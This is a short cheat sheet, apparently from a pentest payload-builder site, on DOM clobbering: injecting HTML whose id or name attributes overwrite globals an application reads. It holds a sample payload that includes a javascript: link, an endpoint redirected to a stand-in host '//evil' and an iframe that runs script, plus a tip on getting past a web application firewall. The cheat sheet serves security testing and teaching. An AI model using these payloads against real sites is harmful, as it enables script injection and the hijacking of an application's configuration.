Skip to content
← Cheat Sheets

DOM Clobbering Cheat Sheet

DOM Clobbering Cheat Sheet

Concept

Inject HTML elements whose id or name attributes collide with DOM collections or JS variables the app reads later (window.config, defaultPolicy, etc.).

Common patterns

<a id="x" name="y" href="javascript:alert(1)">
  <form id="config">
    <input name="endpoint" value="//evil" />
    <img name="csp" content="default-src *" />
    <iframe name="trusted" srcdoc="<script>alert(1)</script>"></iframe></form
></a>

When it helps

  • CSP or config read from DOM clobbered globals
  • Sanitizer allows some tags but app trusts document.getElementById(...)
  • Gadget chains in client-side frameworks

Testing tips

  • Identify JS that reads window[name] or document.getElementById
  • Pair with filter profile tokens the WAF still allows (id, name, form)
  • Browse DOM Clobbering templates in the builder